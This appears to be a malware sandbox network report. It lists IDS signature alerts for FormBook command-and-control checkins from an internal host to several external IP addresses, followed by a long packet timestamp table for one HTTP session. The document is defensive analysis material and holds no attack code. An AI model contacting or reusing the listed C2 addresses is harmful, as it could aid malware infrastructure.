                                                                                  2024-08-27T17:50:19.428943+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514985980192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:50:19.428943+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214985980192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:50:41.589299+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986580192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:48:09.906772+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982880192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:46:53.854859+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314980980192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:50:14.139128+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314985780192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:46:30.762152+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514980780192.168.11.20154.23.184.218
                                                                                  2024-08-27T17:46:30.762152+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214980780192.168.11.20154.23.184.218
                                                                                  2024-08-27T17:48:12.659988+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982980192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:50:00.598770+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314985380192.168.11.20154.23.184.218
                                                                                  2024-08-27T17:51:20.709819+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314987480192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:49:06.103987+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984280192.168.11.20148.135.49.178
                                                                                  2024-08-27T17:48:36.983232+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314983480192.168.11.203.82.56.39
                                                                                  2024-08-27T17:50:16.776730+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314985880192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:45:52.320809+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa24980680192.168.11.2023.111.141.202
                                                                                  2024-08-27T17:50:27.509089+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986180192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:47:47.146655+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982280192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:47:07.386107+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314981380192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:47:04.678519+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314981280192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:50:06.272021+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514985580192.168.11.20154.23.184.218
                                                                                  2024-08-27T17:50:06.272021+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214985580192.168.11.20154.23.184.218
                                                                                  2024-08-27T17:49:57.726489+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314985280192.168.11.20154.23.184.218
                                                                                  2024-08-27T17:50:44.450788+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986680192.168.11.2038.47.207.120
                                                                                  2024-08-27T17:51:09.232935+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514987180192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:51:09.232935+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214987180192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:47:58.613319+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982580192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:51:28.877508+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314987680192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:48:34.331911+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314983380192.168.11.203.82.56.39
                                                                                  2024-08-27T17:46:56.492735+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314981080192.168.11.2076.223.67.189
                                                                                  2024-08-27T17:51:23.417319+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514987580192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:51:23.417319+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214987580192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:47:44.402088+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982180192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:50:32.911692+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514986380192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:50:32.911692+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214986380192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:49:41.237366+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314985080192.168.11.20199.59.243.226
                                                                                  2024-08-27T17:47:10.100521+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314981480192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:47:55.970424+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314982480192.168.11.2035.244.245.121
                                                                                  2024-08-27T17:48:15.429633+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314983080192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:49:09.211330+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514984380192.168.11.20148.135.49.178
                                                                                  2024-08-27T17:49:09.211330+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214984380192.168.11.20148.135.49.178
                                                                                  2024-08-27T17:48:18.187877+0200TCP2050745ET MALWARE FormBook CnC Checkin (GET) M514983180192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:48:18.187877+0200TCP2855465ETPRO MALWARE FormBook CnC Checkin (GET) M214983180192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:48:45.539362+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314983680192.168.11.20172.96.191.39
                                                                                  2024-08-27T17:51:34.376523+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314987880192.168.11.2085.159.66.93
                                                                                  2024-08-27T17:50:30.207492+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986280192.168.11.20203.161.42.73
                                                                                  2024-08-27T17:51:03.700384+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314986980192.168.11.20194.58.112.174
                                                                                  2024-08-27T17:49:27.990492+0200TCP2855464ETPRO MALWARE FormBook CnC Checkin (POST) M314984680192.168.11.203.33.130.190
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Aug 27, 2024 17:45:52.045907021 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.182406902 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.182605028 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.183060884 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.319437981 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320461988 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320571899 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320702076 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320717096 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320806980 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320808887 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.320859909 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.320911884 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.320930958 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320943117 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.320976973 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.321042061 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.321053028 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.321064949 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.321094990 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.321212053 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.321212053 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.457650900 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.457746029 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.457830906 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.457928896 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.457986116 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458049059 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458064079 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458200932 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458206892 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458326101 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458340883 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458350897 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458405972 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458528042 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458623886 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458623886 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458662033 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458707094 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458754063 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458776951 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458832979 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458883047 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.458904028 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458957911 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.458987951 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.459028006 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.459052086 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.459161997 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.459220886 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.459340096 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.459352970 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.459404945 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.459459066 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.459506989 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.459559917 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.459671021 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.594764948 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.594856977 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.594958067 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.595021963 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.595052004 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.595191002 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.595259905 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.595380068 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.595393896 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.595397949 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.595527887 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.595647097 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.595769882 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.595788002 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.595889091 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.595957041 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596035004 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596062899 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596076012 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596175909 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596271992 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596282959 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596347094 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596390963 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596425056 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596442938 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596594095 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596642971 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596694946 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596770048 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596821070 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596828938 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.596929073 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.596971035 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.597018957 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.597023010 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.597074032 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.597085953 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.597088099 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.597166061 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.597189903 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.597296000 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.597297907 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.597310066 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.597321033 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.597347975 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.597426891 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.597426891 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.598611116 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.598722935 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.598752975 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.598855019 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.598881960 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.598985910 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.598999977 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599013090 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599107027 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599206924 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599212885 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599256039 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599349976 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599374056 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599477053 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599570990 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599590063 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599643946 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599662066 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599740028 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599764109 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599831104 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599869967 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.599947929 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.599965096 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.600001097 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.600104094 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.731651068 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.731667042 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.731901884 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.731996059 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732115984 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732213020 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.732276917 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.732284069 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732400894 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732419968 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.732569933 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732601881 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.732706070 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.732707024 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732814074 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732825994 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732876062 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.732913971 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.732965946 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.732966900 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733043909 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733078003 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733176947 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733212948 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733264923 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733342886 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733443975 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733455896 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733537912 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733589888 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733668089 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733691931 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733797073 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733876944 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733911037 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.733953953 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.733967066 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734045029 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734081030 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734092951 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734175920 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734188080 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734252930 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734330893 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734353065 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734458923 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734536886 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734539032 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734616995 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734663963 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734694958 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734796047 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734798908 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.734911919 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.734981060 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735071898 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735083103 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.735188961 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.735286951 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.735292912 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735383987 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735416889 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.735461950 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735644102 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735661983 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.735714912 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.735812902 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735891104 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.735913992 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736046076 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736073017 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736099005 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736110926 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736176968 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736295938 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736371994 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736419916 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736449957 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736474991 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736485958 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736567020 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736668110 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736696959 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736718893 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736814022 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736824989 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736862898 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.736931086 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.736957073 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737056971 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737138987 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737170935 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737190962 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737226009 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737237930 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737308025 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737329006 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737425089 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737433910 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737477064 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737581015 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737592936 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737698078 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737788916 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737867117 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.737919092 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.737971067 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738114119 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.738218069 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738229036 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738293886 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738420963 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738451958 CEST4980680192.168.11.2023.111.141.202
                                                                                  Aug 27, 2024 17:45:52.738475084 CEST804980623.111.141.202192.168.11.20
                                                                                  Aug 27, 2024 17:45:52.738487005 CEST804980623.111.141.202192.168.11.20
